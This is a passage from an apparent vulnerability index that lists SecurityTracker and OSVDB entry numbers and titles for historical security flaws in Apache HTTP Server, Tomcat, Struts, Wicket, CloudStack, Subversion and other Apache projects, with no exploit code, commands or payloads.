16002| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
16003| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
16004| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
16005| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
16006| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
16007| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
16008| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
16009| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
16010| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
16011| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
16012| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
16013| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
16014| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
16015| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
16016| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
16017| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
16018| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
16019| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
16020| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
16021| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
16022| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
16023| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
16024| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
16025| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
16026| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
16027| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
16028| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
16029| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
16030| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
16031| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
16032| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
16033| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
16034| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
16035| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
16036| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
16037| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
16038| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
16039| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
16040| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
16041| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
16042| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
16043| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
16044| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
16045| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
16046| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
16047| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
16048| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
16049| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
16050| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
16051| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
16052| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
16053| [1024096] Apache mod_proxy_http May Return Results for a Different Request
16054| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
16055| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
16056| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
16057| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
16058| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
16059| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
16060| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
16061| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
16062| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
16063| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
16064| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
16065| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
16066| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
16067| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
16068| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
16069| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
16070| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
16071| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
16072| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
16073| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
16074| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
16075| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
16076| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
16077| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
16078| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
16079| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
16080| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
16081| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
16082| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
16083| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
16084| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
16085| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
16086| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
16087| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
16088| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
16089| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
16090| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
16091| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
16092| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
16093| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
16094| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
16095| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
16096| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
16097| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
16098| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
16099| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
16100| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
16101| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
16102| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
16103| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
16104| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
16105| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
16106| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
16107| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
16108| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
16109| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
16110| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
16111| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
16112| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
16113| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
16114| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
16115| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
16116| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
16117| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
16118| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
16119| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
16120| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
16121| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
16122| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
16123| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
16124| [1008920] Apache mod_digest May Validate Replayed Client Responses
16125| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
16126| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
16127| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
16128| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
16129| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
16130| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
16131| [1008030] Apache mod_rewrite Contains a Buffer Overflow
16132| [1008029] Apache mod_alias Contains a Buffer Overflow
16133| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
16134| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
16135| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
16136| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
16137| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
16138| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
16139| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
16140| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
16141| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
16142| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
16143| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
16144| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
16145| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
16146| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
16147| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
16148| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
16149| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
16150| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
16151| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
16152| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
16153| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
16154| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
16155| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
16156| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
16157| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
16158| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
16159| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
16160| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
16161| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
16162| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
16163| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
16164| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
16165| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
16166| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
16167| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
16168| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
16169| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
16170| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
16171| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
16172| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
16173| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
16174| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
16175| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
16176| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
16177| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
16178| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
16179| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
16180| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
16181| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
16182| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
16183| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
16184| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
16185| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
16186| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
16187| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
16188| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
16189|
16190| OSVDB - http://www.osvdb.org:
16191| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
16192| [96077] Apache CloudStack Global Settings Multiple Field XSS
16193| [96076] Apache CloudStack Instances Menu Display Name Field XSS
16194| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
16195| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
16196| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
16197| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
16198| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
16199| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
16200| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
16201| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
16202| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
16203| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
16204| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
16205| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
16206| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
16207| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
16208| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
16209| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
16210| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
16211| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
16212| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
16213| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
16214| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
16215| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
16216| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
16217| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
16218| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
16219| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
16220| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
16221| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
16222| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
16223| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
16224| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
16225| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
16226| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
16227| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
16228| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
16229| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
16230| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
16231| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
16232| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
16233| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
16234| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
16235| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
16236| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
16237| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
16238| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
16239| [94279] Apache Qpid CA Certificate Validation Bypass
16240| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
16241| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
16242| [94042] Apache Axis JAX-WS Java Unspecified Exposure
16243| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
16244| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
16245| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
16246| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
16247| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
16248| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
16249| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
16250| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
16251| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
16252| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
16253| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
16254| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
16255| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
16256| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
16257| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
16258| [93541] Apache Solr json.wrf Callback XSS
16259| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
16260| [93521] Apache jUDDI Security API Token Session Persistence Weakness
16261| [93520] Apache CloudStack Default SSL Key Weakness
16262| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
16263| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
16264| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
16265| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
16266| [93515] Apache HBase table.jsp name Parameter XSS
16267| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
16268| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
16269| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
16270| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
16271| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
16272| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
16273| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
16274| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
16275| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
16276| [93252] Apache Tomcat FORM Authenticator Session Fixation
16277| [93172] Apache Camel camel/endpoints/ Endpoint XSS
16278| [93171] Apache Sling HtmlResponse Error Message XSS
16279| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
16280| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
16281| [93168] Apache Click ErrorReport.java id Parameter XSS
16282| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
16283| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
16284| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
16285| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
16286| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
16287| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
16288| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
16289| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
16290| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
16291| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
16292| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
16293| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
16294| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
16295| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
16296| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
16297| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
16298| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
16299| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
16300| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
16301| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
16302| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
16303| [93144] Apache Solr Admin Command Execution CSRF
16304| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
16305| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
16306| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
16307| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
16308| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
16309| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
16310| [92748] Apache CloudStack VM Console Access Restriction Bypass
16311| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
16312| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
16313| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
16314| [92706] Apache ActiveMQ Debug Log Rendering XSS
16315| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
16316| [92270] Apache Tomcat Unspecified CSRF
16317| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
16318| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
16319| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
16320| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
16321| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
16322| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
16323| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
16324| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
16325| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
16326| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
16327| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
16328| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
16329| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
16330| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
16331| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
16332| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
16333| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
16334| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
16335| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
16336| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
16337| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
